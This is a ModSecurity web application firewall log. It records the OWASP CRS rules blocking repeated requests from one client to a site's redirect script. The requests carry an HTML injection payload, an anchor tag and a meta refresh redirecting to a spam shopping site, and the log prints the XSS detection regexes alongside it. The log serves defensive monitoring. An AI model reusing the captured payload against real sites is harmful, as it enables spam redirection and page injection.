[Tue May 12 06:25:08.853272 2026] [security2:error] [pid 1820198:tid 1820216] [client 27.78.84.116:63215] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>The most beautiful evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WA [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKrpM1tk6y7yBJLpJpH1AAAAJA"]
[Tue May 12 06:25:08.853455 2026] [security2:error] [pid 1820198:tid 1820216] [client 27.78.84.116:63215] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>The most beautiful evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKrpM1tk6y7yBJLpJpH1AAAAJA"]
[Tue May 12 06:25:08.853874 2026] [security2:error] [pid 1820198:tid 1820216] [client 27.78.84.116:63215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKrpM1tk6y7yBJLpJpH1AAAAJA"]
[Tue May 12 06:25:08.854164 2026] [security2:error] [pid 1820198:tid 1820216] [client 27.78.84.116:63215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKrpM1tk6y7yBJLpJpH1AAAAJA"]
[Tue May 12 06:25:09.619856 2026] [security2:error] [pid 1825287:tid 1825319] [client 27.78.84.116:63378] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://s.aleoklop.atarget=\\x5c\\x22_blank\\x5c\\x22 hrefmailto:e@ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>the most beautiful evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKrpQgpmE1yW0glLdg-hAAAAM4"]
[Tue May 12 06:25:09.620286 2026] [security2:error] [pid 1825287:tid 1825319] [client 27.78.84.116:63378] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>The most beautiful evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>The most beautiful evening dresses</a><meta http-equiv=r..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKrpQgpmE1yW0glLdg-hAAAAM4"]
[Tue May 12 06:25:09.620451 2026] [security2:error] [pid 1825287:tid 1825319] [client 27.78.84.116:63378] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>The most beautiful evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC- [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKrpQgpmE1yW0glLdg-hAAAAM4"]
[Tue May 12 06:25:09.620557 2026] [security2:error] [pid 1825287:tid 1825319] [client 27.78.84.116:63378] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>The most beautiful evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WA [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKrpQgpmE1yW0glLdg-hAAAAM4"]
[Tue May 12 06:25:09.620735 2026] [security2:error] [pid 1825287:tid 1825319] [client 27.78.84.116:63378] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>The most beautiful evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKrpQgpmE1yW0glLdg-hAAAAM4"]
[Tue May 12 06:25:09.621171 2026] [security2:error] [pid 1825287:tid 1825319] [client 27.78.84.116:63378] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKrpQgpmE1yW0glLdg-hAAAAM4"]
[Tue May 12 06:25:09.621472 2026] [security2:error] [pid 1825287:tid 1825319] [client 27.78.84.116:63378] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKrpQgpmE1yW0glLdg-hAAAAM4"]
[Tue May 12 06:25:10.337480 2026] [security2:error] [pid 1808852:tid 1808866] [client 27.78.84.116:63470] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://s.aleoklop.atarget=\\x5c\\x22_blank\\x5c\\x22 hrefmailto:e@ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>the most beautiful evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKrphfeipD4uoG21FpDtQAAAAs"]
[Tue May 12 06:25:10.337911 2026] [security2:error] [pid 1808852:tid 1808866] [client 27.78.84.116:63470] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>The most beautiful evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>The most beautiful evening dresses</a><meta http-equiv=r..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKrphfeipD4uoG21FpDtQAAAAs"]
[Tue May 12 06:25:10.338075 2026] [security2:error] [pid 1808852:tid 1808866] [client 27.78.84.116:63470] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>The most beautiful evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC- [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKrphfeipD4uoG21FpDtQAAAAs"]
[Tue May 12 06:25:10.338180 2026] [security2:error] [pid 1808852:tid 1808866] [client 27.78.84.116:63470] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>The most beautiful evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WA [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKrphfeipD4uoG21FpDtQAAAAs"]
[Tue May 12 06:25:10.338355 2026] [security2:error] [pid 1808852:tid 1808866] [client 27.78.84.116:63470] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>The most beautiful evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKrphfeipD4uoG21FpDtQAAAAs"]
[Tue May 12 06:25:10.338781 2026] [security2:error] [pid 1808852:tid 1808866] [client 27.78.84.116:63470] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKrphfeipD4uoG21FpDtQAAAAs"]
[Tue May 12 06:25:10.339061 2026] [security2:error] [pid 1808852:tid 1808866] [client 27.78.84.116:63470] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKrphfeipD4uoG21FpDtQAAAAs"]
[Tue May 12 06:25:11.024544 2026] [security2:error] [pid 1844863:tid 1844892] [client 27.78.84.116:63539] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://s.aleoklop.atarget=\\x5c\\x22_blank\\x5c\\x22 hrefmailto:e@ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>the most beautiful evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKrp_aAnTZtx1_H_wzItQAAAVc"]
[Tue May 12 06:25:11.024968 2026] [security2:error] [pid 1844863:tid 1844892] [client 27.78.84.116:63539] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>The most beautiful evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>The most beautiful evening dresses</a><meta http-equiv=r..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKrp_aAnTZtx1_H_wzItQAAAVc"]
[Tue May 12 06:25:11.025136 2026] [security2:error] [pid 1844863:tid 1844892] [client 27.78.84.116:63539] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>The most beautiful evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC- [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKrp_aAnTZtx1_H_wzItQAAAVc"]
[Tue May 12 06:25:11.025255 2026] [security2:error] [pid 1844863:tid 1844892] [client 27.78.84.116:63539] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>The most beautiful evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WA [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKrp_aAnTZtx1_H_wzItQAAAVc"]
[Tue May 12 06:25:11.025426 2026] [security2:error] [pid 1844863:tid 1844892] [client 27.78.84.116:63539] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>The most beautiful evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKrp_aAnTZtx1_H_wzItQAAAVc"]
